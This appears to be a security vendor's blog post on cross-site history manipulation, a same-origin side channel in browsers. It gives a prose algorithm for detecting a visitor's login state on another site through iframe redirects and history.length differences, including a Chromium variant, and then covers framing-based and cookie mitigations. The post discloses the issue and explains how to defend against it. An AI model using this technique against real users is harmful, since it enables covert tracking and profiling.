Rewriting Your History Using a Historical Vulnerability

Share on facebook
Share on twitter
Share on linkedin
In recent years, cross-site history manipulation (or XSHM for short) has garnered rising attention from our customers. With this and our team being inspired by this recent CSO article exploring legacy software bugs, we decided to take a closer look to see what's changed with XSHM, discovering that some of the browsers underwent changes. These changes, though not directly related to the vulnerability itself nor its mitigation, have an impact on the nature of exploitation as well as remediation - all of which we’ll explore in this writeup. First things first: XSHM is a SOP (Same-Origin-Policy) side-channel information disclosure found and disclosed by Alex Roichman, Checkmarx’s Director of Cloud-Native Security, more than 11 years ago. To this day, the issue has still not been properly addressed. The XSHM vulnerability arises when a frameable application (i.e. it’s possible to <iframe> the app), changes the user’s browser location, based on a result of a condition. Typically, that means HTTP 302 Redirect in server-side apps, or history stack manipulation in SPAs. An attacker will be able to craft a malicious website and then use the history stack as an oracle to test if a user is logged in with another website, if said website doesn't sufficiently protect against this type of attack. Combining this with other user ‘fingerprints’ such as cookies can allow tracking users. Before we dig into the security-related topics, there are a few simple assumptions we have to make in order to understand the concepts behind this vulnerability. DISCLAIMER: These are assumptions rather than facts, because the history-stack is somewhat of a grey-area in terms of SOP. There are no “strict rules” for how history-stacks should be handled, but we did put links to relevant specifications.
  • Assumption #1: Browsers have a history stack (often referred to as a “history object”) for each opened tab. This stack contains all the visited pages in the particular tab. Actually, you probably know this history stack pretty well, as it’s exactly the same one as the one in your browser.
 

Fig. 1 – The history stack and a list of history entries in Google Chrome browser

  • Assumption #2: If a website loads an <iframe> within it, every page that is visited by the user inside the <iframe> will be served to the user as it was pushed to the stack of the parent window (W3 calls it a “fact” in “typical browsers”, however, I still prefer to call it an assumption).
  • Assumption #3: History stack doesn’t contain the same page entry twice (or more) in a row.
  • Assumption #4: Browsers enforce the SOP (Same-Origin-Policy), which means that sites with different origins (i.e. scheme, domain, or port) should never be able to access each other’s data (e.g. localStorage items, cookies and …drum roll… the history stack length).
Well, I lied. The truth is that it is actually possible to access history stack length even if it contains sites with different origins. You may wonder why we should care about the history stack length. You’re in the right place, hold on.

Fig. 2 – Demo of XSHM Exploitation

The Evil Diff

The idea behind the exploitation of XSHM is to conclude the result of a conditional statement, based on a diff between two history-stack lengths. This is the algorithm that was suggested by Alex to find a diff:
  1. Creating an IFrame that points to the login page in the vulnerable website (this page should be pushed to the history stack).
  2. Read the current length of the history stack (using length) and save it.
  3. Change the IFrame src attribute to a URL of a protected page and read the length again.
  4. From assumption #2:
    1. If the length is the same in both cases, the user was redirected from the protected page to the login page (i.e. not authenticated), thus no new entries were pushed to the stack.
    2. However, if the length was increased, that means that the user accessed the protected page (i.e. is authenticated).
It’s also important to note that the “diff behavior” is not necessarily consistent (more on that later) because today it’s pretty common to push/replace history entries explicitly (mainly in SPAs). However, eliminating this diff completely may be a tough task for application developers who want to write secure code. This is why the diff is ‘evil’ – we almost can do nothing to mitigate it.

Finding Up-to-Date Diff

Today, for some browsers, this may not work exactly as described above. For example, in Chromium based browsers, assumption #3 is no longer correct, and a modification is needed: Corrected Assumption #3: History stack shouldn’t contain the same page entry twice (or more) in a row, unless the user was redirected to this page. Remember when I said that the diff behavior may vary? In the previous example, we saw that if the user was authenticated, the history.length was increased. And if not, the length stayed the same. In the following example, we take advantage of the corrected Assumption #3:

Let’s break it down.

The main difference is that instead of redirecting the user only once, we redirect him or her a few times, note that each time the <iframe> is loaded (line 8) the changeSrc() is called, this process repeats as longs as counter is less than 6 (line 26). Each time we set the iframe's src attribute to the restricted page, the vulnerable application will decide whether it serves the page or redirects the user to Login. If the user has access to the restricted page (i.e. he or she is authenticated) the history stack length won’t increase more than one time. The reason is assumption #3, the private page is first pushed into the stack (so it’s the top entry), then, because no redirections occur, it shouldn’t be pushed again. However, if the user is not authenticated, the login page entry will be pushed to the stack always, because the user is redirected (in this case, the length increases if the user is authenticated).

Do you see it? We found a brand new diff.

As you can see, finding a diff doesn’t necessarily mean you have to work hard. You’ll probably have to take some time to test your site with a particular browser, and once you understand how (and if) the diff “behaves,” you’ll be able to craft your own exploit. Furthermore, even if you found a browser that doesn’t meet the assumptions we made above, it doesn't mean it can’t be exploited.

Mitigation

Fortunately, we don’t need to eliminate the diff in order to mitigate this vulnerability. It’s enough to block the option to frame our website in an external website, which is a good practice regardless of this vulnerability. The simplest way to do so is to set the response header x-frame-options to deny (supported by new & old browsers) or set the frame-ancestors directive of the CSP Header to none (supported in new browsers). Note that if you’re using cookies, it’s also possible to mitigate this vulnerability by setting the sameSite attribute to Lax or Strict. Though browsers should set the defaults to Lax, you must set it explicitly because not all modern browsers follow it (of course this will help only if the condition’s result is based on the cookie such as in cookie-authentication).

What About the Random-Token Sanitizer?

In the past, an acceptable mitigation was to add a randomly-generated token (a string or a number) to any URL in the web application. It guarantees that every URL is unique, thus will always be pushed to the stack. Theoretically, this mitigation should be sufficient, but in practice, it's very hard to maintain such a sanitizer which is spread all over the application. In addition, many fail to implement it correctly and put a random-token on a single specific URL (which possibly has no impact on the ability to find a diff). Instead, we highly encourage you to block framing for the whole app. This approach is more secure, elegant, less prone to bugs, and much easier to maintain.

Final Words

This writeup introduced two main considerations. The first, for our developer readers, discusses different variants of this vulnerability as well as several mitigations. Additionally, we demonstrated what general exploitation looks like (finding a diff), which makes it possible to exploit XSHM also in client-side “redirections.” Finally, we explained why the old random-token sanitizer shouldn’t be used anymore. The second consideration is how browsers’ broken logic leaves users open to tracking, surveillance and online profiling, which leads us to much wider issue: long-lived and well-known vulnerabilities stay exploitable for years. This was tested and holds true for the following browsers (but it isn’t limited to them):
BROWSER Chrome Firefox Edge IE
VERSION 91.0.4472.101 89.0 91.0.864.37 11.0.0.4
  Note that the exploitability of XSHM is dependent on both browser (vendor, version, etc.) and the web-application itself. A vulnerability is per a combination of a browser and web-app.

Latest Blog Posts

Follow Us

Latest from Our Blog

Skip to content